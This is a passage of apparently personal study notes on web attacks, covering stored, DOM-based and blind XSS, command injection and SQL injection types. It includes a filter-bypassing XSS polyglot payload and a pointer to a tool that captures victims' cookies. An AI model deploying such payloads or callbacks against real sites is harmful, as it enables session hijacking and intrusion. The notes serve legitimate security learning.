<p>The XSS payload is stored on the web application (in a database, for example) and then gets run when other users visit the site or web page.</p>
<p>How to test for Stored XSS:</p>
<p>You'll need to test every possible point of entry where it seems data is stored and then shown back in areas that other users have access to; a small example of these could be:
- Comments on a blog
- User profile information
- Website Listings</p>
<h3 id="dom-based-xss">DOM Based XSS<a class="headerlink" href="#dom-based-xss" title="Permanent link">&para;</a></h3>
<p><a href="https://www.w3.org/TR/REC-DOM-Level-1/introduction.html">DOM</a> stands for <strong>Document Object Model</strong> and is a programming interface for <code>HTML</code> and <code>XML</code> documents.
It represents the <code>page</code> so that programs can change the <strong>document structure, style and content</strong>.
A web <code>page</code> is a document, and this document can be either displayed in the <code>browser window</code> or as the <code>HTML source</code>.</p>
<p>DOM Based XSS is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code.
Execution occurs when the website JavaScript code acts on input or user interaction.</p>
<p>How to test for Dom Based XSS:
1. You'd need to look for parts of the code that access certain <code>variables</code> that an attacker can have control over, such as <code>window.location.x</code> parameters.
2. When you've found those bits of code, you'd then need to see how they are handled and whether the <code>values</code> are ever written to the web page's DOM or passed to unsafe JavaScript methods such as <code>eval()</code>.</p>
<h3 id="blind-xss">Blind XSS<a class="headerlink" href="#blind-xss" title="Permanent link">&para;</a></h3>
<p>Blind XSS is similar to a stored XSS in that your payload gets stored on the website for another user to view.
However, you can't see the payload working or be able to test it against yourself first.</p>
<p>How to test for Blind XSS:
- Ensure your payload has a call back (usually an HTTP request). This way, you know if and when your code is being executed.
- A popular tool for Blind XSS attacks is <a href="https://github.com/mandatoryprogrammer/xsshunter-express">XSS Hunter Express</a>, this tool will automatically capture cookies, URLs, page contents and more.</p>
<h3 id="xss-polyglots">XSS Polyglots<a class="headerlink" href="#xss-polyglots" title="Permanent link">&para;</a></h3>
<p>An XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one.
<div class="language-js highlight"><pre><span></span><code><span id="__span-2-1"><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="nx">jaVasCript</span><span class="o">:</span><span class="cm">/*-/*`/*\`/*&#39;/*&quot;/**/</span><span class="p">(</span><span class="cm">/* */</span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;THM&#39;</span><span class="p">)</span><span class="w"> </span><span class="p">)</span><span class="c1">//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert(&#39;THM&#39;)//&gt;\x3e</span>
</span></code></pre></div></p>
<h2 id="command-injection">Command Injection<a class="headerlink" href="#command-injection" title="Permanent link">&para;</a></h2>
<p>Command injection is the abuse of an application's behaviour to execute commands on the operating system, using the same privileges that the application on a device is running with.</p>
<p>Command injection is also often known as “Remote Code Execution” (RCE) because of the ability to remotely execute code within an application.</p>
<p><a href="https://github.com/payloadbox/command-injection-payload-list">Cheat Sheet</a></p>
<h2 id="sql-injection">SQL Injection<a class="headerlink" href="#sql-injection" title="Permanent link">&para;</a></h2>
<p><code>SQL</code> (Structured Query Language) Injection, mostly referred to as <code>SQLi</code>, is an attack on a web application database server that causes malicious queries to be executed. A database is controlled by a <code>DBMS</code>, which is an acronym for  Database Management System.</p>
<table>
<thead>
<tr>
<th>SQLi type</th>
<th>Description</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>In-Band</td>
<td>In-Band just refers to the <code>same method of communication</code> being used to exploit the vulnerability and also receive the results.</td>
<td>Discovering an SQL Injection vulnerability on a website page and then being able to extract data from the database to the same page.</td>
</tr>
<tr>
<td>Blind SQLi</td>
<td>We get little to no feedback to confirm whether our injected queries were, in fact, successful or not</td>
<td>Authentication bypass, boolean based, time based</td>
</tr>
<tr>
<td>Out-of-band</td>
<td>Isn't as common as it either depends on specific features being enabled on the database server or the web application's business logic, which makes some kind of <code>external network call</code> based on the results from an SQL query.</td>
<td>The attack channel could be a web request, and the data gathering channel could be monitoring HTTP/DNS requests made to a service you control.</td>
</tr>
</tbody>
</table>












                
              </article>
            </div>
          
          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
          <button type="button" class="md-top md-icon" data-md-component="top" hidden>
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
  Back to top
</button>
        
      </main>
      
        <footer class="md-footer">
  
    
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
    <div class="md-copyright__highlight">
      <a href="https://github.com/grimy86/grimy86.github.io/blob/main/LICENSE">Copyright &copy; since 2024</a>

    </div>
  
  
</div>
      
        <div class="md-social">
  
    
    
    
    
    <a href="mailto:grimy86@proton.me" target="_blank" rel="noopener" title="" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><!--! Font Awesome Free 6.7.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M48 64C21.5 64 0 85.5 0 112c0 15.1 7.1 29.3 19.2 38.4l217.6 163.2c11.4 8.5 27 8.5 38.4 0l217.6-163.2c12.1-9.1 19.2-23.3 19.2-38.4 0-26.5-21.5-48-48-48zM0 176v208c0 35.3 28.7 64 64 64h384c35.3 0 64-28.7 64-64V176L294.4 339.2a63.9 63.9 0 0 1-76.8 0z"/></svg>
    </a>
  
    
    
    
    
      
      
    
    <a href="https://github.com/grimy86" target="_blank" rel="noopener" title="github.com" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.7.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
      <div class="md-progress" data-md-component="progress" role="progressbar"></div>
    
    
    
      
      <script id="__config" type="application/json">{"base": "../../..", "features": ["navigation.instant", "navigation.instant.prefetch", "navigation.instant.progress", "navigation.tracking", "navigation.tabs", "navigation.sections", "navigation.path", "navigation.prune", "navigation.indexes", "navigation.top", "navigation.footer"], "search": "../../../assets/javascripts/workers/search.f8cc74c7.min.js", "tags": null, "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}, "version": null}</script>
    
    
      <script src="../../../assets/javascripts/bundle.c8b220af.min.js"></script>
      
    
  </body>
</html>